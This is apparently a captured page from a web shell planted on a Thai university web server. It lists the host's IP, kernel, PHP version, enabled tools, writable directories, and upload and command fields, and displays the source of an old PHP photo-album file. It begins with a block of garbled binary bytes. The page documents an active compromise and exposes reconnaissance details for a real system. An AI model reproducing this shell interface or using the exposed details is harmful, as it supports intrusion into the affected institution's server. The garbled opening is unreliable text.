h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/arit/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/arit/PicActivity.php.old
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>

<style type="text/css">
#PicActivity
{
	width:700px;
	background-color:#FFFFFF;
}

#mainpic
{
	margin-top:5px;
	width:350px;
	display:inline-block;
	float:left;
	background-color:#FFFFFF;

	
}
.title-album{
	
	background-color: #6633ff;
	 height:auto; 
	 margin-top:-5px; 
	 padding:5px 5px 5px 5px;
	  color: #FFF;
	  float:left;
z-index:100;}
.title-album a{
	text-decoration:none;
	color:#FFF;
}
.title-album a:hover{
	text-decoration:underline;
}

#showpic
{
	width:350px;
	display:inline-block;
	float:right;
	background-color:#FFF;
}

ul.showInColumn{  
    display:block;float:right;  
    list-style:none;  
    padding:0;margin:0;  
    width:350px;   
/*  background-color:#FFCCCC;*/  
    border:0px solid #FFF;  /* เทียบใกล้เคียงกับการกำหนด  ของ table  */    
    padding:2px 0 2px 2px;  
}  
ul.showInColumn li{  
    list-style:none;  
    display:block;float:left;  
    background-color:#FFF;  
    margin:2px;  /* เทียบใกล้เคียงกับการกำหนด  cellspacing"  ของ table  */  
    margin-left:3px;  
    padding:5px; /* เทียบใกล้เคียงกับการกำหนด  cellpadding  ของ table  */  
    border:0px solid #FFF;  /* เทียบใกล้เคียงกับการกำหนด border ใน td ของ table  */  
    width:160px; /*  กำหนดความกว้างของแต่ละคอลัมน์  */  
}  


</style>
</head>

<body>
<div id="PicActivity">

<div id="mainpic">
	<? 
	include "connect.php";
	$sql="SELECT * FROM group_pic ORDER BY id_group DESC LIMIT 0,1";
			   $query=mysql_query($sql);
			   $arr=mysql_fetch_array($query);
			   $id_group =$arr[id_group];
			   $message_group =$arr[message_group];
			   $message_group=iconv_substr($message_group, 0,350, "UTF-8");

			   //echo "$message_group";
			   
	?>

	<a href="<? echo "AlbumThum.php?id_group=$id_group&name_group=$name_group";?>"><img  src="<? echo "file/relax/headpic/$id_group.jpg";?>" width="350" border="0"	></a> <p class="title-album"> <a href="<? echo "AlbumThum.php?id_group=$id_group&name_group=$name_group";?>"><? echo "$message_group";?> &raquo; อ่านต่อ</a></p>
</div>

<div id="showpic">
	<ul class="showInColumn">  
		<?php  
                         
			   $sql="SELECT * FROM group_pic ORDER BY id_group DESC LIMIT 1,4";
			   $query=mysql_query($sql);
					  while($arr=mysql_fetch_array($query)){
			   			$id_group =$arr[id_group];
						$name_group =$arr[name_group];
			   $message_group =$arr[message_group];
						$message_group=iconv_substr($message_group, 0,60, "UTF-8");

		?>  
					 
                      <li> <a href="<? echo "AlbumThum.php?id_group=$id_group&name_group=$name_group";?>"><img src="<? echo 			"file/relax/headpic/$id_group.jpg";?>" width="150" height="100" border="0" style=""></a> 
					    <p  class="top-title"> <a   href="<? echo "AlbumThum.php?id_group=$id_group&name_group=$name_group";?>"><?php $detail=substr($album_list['HEAD_HEADER'],0,48); echo "$message_group"; ?>... &raquo; อ่านต่อ</a></p></li>
    

					  
<?php } ?>
</ul> 
</div>
</div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit